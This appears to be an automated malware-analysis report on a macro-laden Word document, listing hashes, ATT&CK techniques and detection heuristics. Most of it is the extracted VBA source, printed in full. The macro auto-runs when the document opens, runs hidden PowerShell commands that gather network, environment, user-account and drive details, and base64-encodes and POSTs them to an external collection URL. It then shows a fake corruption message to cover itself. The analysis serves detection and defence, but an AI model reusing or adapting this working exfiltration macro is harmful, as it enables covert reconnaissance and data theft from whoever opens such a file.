Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 0e7798a4231352e5…

MALICIOUS

Office (OOXML)

Size: 23.2 KB
Created: 2017-10-31 14:05:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-07-24
MD5: 683010899d33bb9e7bdfe88f1b24b345
SHA-1: 5151cc1443a5b1d2d8ccd4ce33101437dd3519e0
SHA-256: 0e7798a4231352e5427c8ce6935a6217e5413ff27a295c71d375c3712f4d8b7e
Risk score: 374

Malware Insights

MITRE ATT&CK
  • T1059.001 PowerShell
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The macros use WScript.Shell and the Shell() function to execute PowerShell commands. These commands are likely used to download and execute a second-stage payload, as the ClamAV detection name 'Doc.Downloader.Pwshell-10001336-0' indicates. The presence of AutoOpen, Document_Open and other auto-execution entry points suggests an attempt to run the malicious code immediately when the document is opened.

Heuristics (11)

  • ClamAV: Doc.Downloader.Pwshell-10001336-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
  • VBA project inside OOXML medium 8 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        tmpOutFile = createTempFile()
        Set wsh = CreateObject("WScript.Shell")
        pscmd = "PowerShell " & Chr(34) & myCmd & " | out-file -encoding utf8 " & tmpOutFile & Chr(34)
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        ''' -------------------------------
        ''' myCmd = "<powershell command>"
        ''' output = RunPowershellCmd(myCmd)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set HttpReq = CreateObject("MSXML2.XMLHTTP")
        ' change path to collection script here
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
        Public Sub AutoOpen()
            submit_mode = "auto"
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
        Public Sub Document_Open()
            submit_mode = "auto"
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
        Public Sub Auto_Open()
            submit_mode = "auto"
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        hostname = Environ("computername")
        username = Environ("username")
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://osiris.compass-security.com/phishing/collect.php (in document text: OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7512 bytes
SHA-256: 2607e42f2688633da9e595049c9c54f519b77310abcf09a69ab8b51775c1d528
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
' TODO
' Change the hardcoded fileID in the Exploit() function
' Adjust the executed PS commands in the Exploit() function as necessary
' Adjust the URL of the collection script in the Request() function
' Adjust the language of the displayed messages

Public submit_mode As String
Public runID As String
Public fileID As String

Private Sub CommandButton1_Click()
    submit_mode = "click"
    Call Exploit
End Sub

Public Sub Document_Open()
    submit_mode = "auto"
    Call Exploit
End Sub

Public Sub Auto_Open()
    submit_mode = "auto"
    Call Exploit
End Sub

Public Sub AutoOpen()
    submit_mode = "auto"
    Call Exploit
End Sub

Public Sub AutoExec()
    submit_mode = "auto"
    Call Exploit
End Sub

Function Exploit()
    ' executed attacks are defined here. add more commands using the template below
    ''' template for PS command
    ''' -------------------------------
    ''' myCmd = "<powershell command>"
    ''' output = RunPowershellCmd(myCmd)
    ''' Call Request(output, "<label>")
    ''' -------------------------------
    On Error GoTo Err2:
    Dim myCmd As String
    Dim output As String
        
    ' generate a random ID to identify connected requests
    runID = RandomString(32)
    ' hardcoded ID to identify source document of requests
    fileID = "contentfiltercheck"
    
    ' Basic information gathering without PowerShell
    Call Request(BasicInfo(), "BasicInfo")
    
    ' Get ip configuration with PS
    myCmd = "Get-NetIPConfiguration"
    output = RunPowershellCmd(myCmd)
    Call Request(output, "ipconfig")
    
    ' Get environment variables with PS
    myCmd = "Get-ChildItem Env:"
    output = RunPowershellCmd(myCmd)
    Call Request(output, "env_vars")
    
    ' Get local user accounts with PS
    myCmd = "Get-WmiObject -Class Win32_UserAccount -Filter  'LocalAccount=True' | Select PSComputername, Name, Status, Disabled, AccountType, Lockout, PasswordRequired, PasswordChangeable, SID "
    output = RunPowershellCmd(myCmd)
    Call Request(output, "local_users")
    
    ' Get connected volumes/shares with PS
    myCmd = "Get-WmiObject -class win32_logicaldisk"
    output = RunPowershellCmd(myCmd)
    Call Request(output, "local_volumes")
    
    ' Show corruption message and close document
    MsgBox "The document is corrupted and cannot be opened.", vbOKOnly
    ActiveDocument.Close SaveChanges:=wdDoNotSaveChanges
    Exit Function

Err2:
     MsgBox "An unknown error  occurred.", vbCritical, "Unknown error"
       
End Function


Function Request(data As String, Optional label As String = "n/a")
    Dim outBytes() As Byte
    Dim encOutput As String
    
    On Error GoTo Err1:
    
    ' base64 encode data to be transmitted
    outBytes = data
    encOutput = Replace(EncodeBase64(outBytes), Chr(10), "")
    
    Dim HttpReq As Object
  
    Set HttpReq = CreateObject("MSXML2.XMLHTTP")
    ' change path to collection script here
    HttpReq.Open "POST", "http://osiris.compass-security.com/phishing/collect.php", False
    HttpReq.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
    HttpReq.send "fileID=" & fileID & "&runID=" & runID & "&data=" & label & ":" & encOutput & "&mode=" & submit_mode
    RequestWin = HttpReq.responseText
    Exit Function
    
Err1:
    MsgBox "An unknown error  occurred.", vbCritical, "Unknown error"
    
End Function

Public Function createTempFile() As String
    ' create a temporary file to store command output
    Dim tmpFolder, tmpName, tmpFile, fso
    
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set tmpFolder = fso.GetSpecialFolder(2)
    tmpName = fso.GetTempName
    Set tmpFile = tmpFolder.CreateTextFile(tmpName)
    tmpFile.Close
    createTempFile = tmpFolder & "\" & tmpName
End Function

Public Function getOutput(ByVal tmpOutFile As String) As String
    ' retrieve command output from temporary file
    Dim tmpFile, fso

    Set fso = CreateObject("Scripting.FileSystemObject")
    Set tmpFile = fso.OpenTextFile(tmpOutFile, 1, False, -1)
    getOutput = tmpFile.readall
    tmpFile.Close
    
End Function

Public Function BasicInfo() As String
    ' collect basic information without PS, should work on all systems
    Dim hostname As String
    Dim username As String
    
    hostname = Environ("computername")
    username = Environ("username")
    BasicInfo = "pc:" & hostname & ";user:" & username

    BasicInfo = CStr(StrConv(CStr(BasicInfo), vbFromUnicode))
    
End Function

Public Function RunPowershellCmd(myCmd As String) As String
    ' execute given powershell command, store output in a temporary file and return output from there
    Dim wsh As Object
    Dim ret
    Dim strOutput, tmpOutFile, pscmd As String
    
    tmpOutFile = createTempFile()
    Set wsh = CreateObject("WScript.Shell")
    pscmd = "PowerShell " & Chr(34) & myCmd & " | out-file -encoding utf8 " & tmpOutFile & Chr(34)
    ret = wsh.Run(pscmd, 0, True)
    strOutput = getOutput(tmpOutFile)
     RunPowershellCmd = strOutput
End Function

Public Function BASE64SHA1(ByVal sTextToHash As String)
    ' base64 encode data and then hash it with sha1
    Dim asc As Object
    Dim enc As Object
    Dim TextToHash() As Byte
    Dim SharedSecretKey() As Byte
    Dim bytes() As Byte
    Const cutoff As Integer = 5

    Set asc = CreateObject("System.Text.UTF8Encoding")
    Set enc = CreateObject("System.Security.Cryptography.HMACSHA1")

    TextToHash = asc.GetBytes_4(sTextToHash)
    SharedSecretKey = asc.GetBytes_4(sTextToHash)
    enc.Key = SharedSecretKey

    bytes = enc.ComputeHash_2((TextToHash))
    BASE64SHA1 = EncodeBase64(bytes)
    'BASE64SHA1 = Left(BASE64SHA1, cutoff)

    Set asc = Nothing
    Set enc = Nothing

End Function

Public Function EncodeBase64(ByRef arrData() As Byte) As String
    ' base64 encode data
    Dim objXML As Object
    Dim objNode As Object

    Set objXML = CreateObject("MSXML2.DOMDocument")
    Set objNode = objXML.createElement("b64")

    objNode.DataType = "bin.base64"
    objNode.nodeTypedValue = arrData
    EncodeBase64 = objNode.Text

    Set objNode = Nothing
    Set objXML = Nothing

End Function

Public Function decodeBase64(ByVal strData As String) As Byte()
    ' base64 decode data
    Dim objXML As Object
    Dim objNode As Object
    
    Set objXML = CreateObject("MSXML2.DOMDocument")
    Set objNode = objXML.createElement("b64")
    objNode.DataType = "bin.base64"
    objNode.Text = strData
    decodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

End Function

Public Function RandomString(l As Integer) As String
    ' generate a random string (lowercase/uppercase/digits) of length l
    Randomize
    Dim rndStr As String
    rndStr = "abcdefghijklmnopqrstuvwxyz"
    rndStr = rndStr & UCase(rndStr) & "0123456789"

    Dim i As Long
    For i = 1 To l
        RandomString = RandomString & Mid$(rndStr, Int(Rnd() * Len(rndStr) + 1), 1)
    Next

End Function
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 25600 bytes
SHA-256: e56050cb4c2a39ee98cce0325bf94f117f45d93553ce7ee11a31724da864fa03
Detection
ClamAV: Doc.Downloader.Pwshell-10001336-0
Obfuscation or payload: unlikely